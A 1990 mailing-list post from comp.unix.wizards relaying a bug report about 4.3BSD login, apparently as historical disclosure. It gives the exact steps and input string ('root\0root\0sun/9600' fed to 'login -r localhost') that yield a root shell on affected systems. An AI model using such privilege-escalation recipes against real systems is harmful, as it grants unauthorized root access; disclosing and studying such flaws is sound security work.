Old rlogin bug
David J. MacKenzie
djm at eng.umd.edu
Thu Jul 26 09:01:01 AEST 1990
Mike Rowan, who wrote the GNU login (still in test stage) sent me a
note recently that might be relevant here, excerpted below:
On a standard 4.3 login system write a program that does this:
fork() & exec login
write to login's stdin:
locuser\0remuser\0tty/speed\0
So I login to a host and run this like so:
exec "login -r localhost"
and stick this on logins stdin: "root\0root\0sun/9600"
And I get a root shell. They took this auth code out of login in 4.3T
and make rlogind do it.
--
David J. MacKenzie <djm at eng.umd.edu> <djm at ai.mit.edu>
More information about the Comp.unix.wizards
mailing list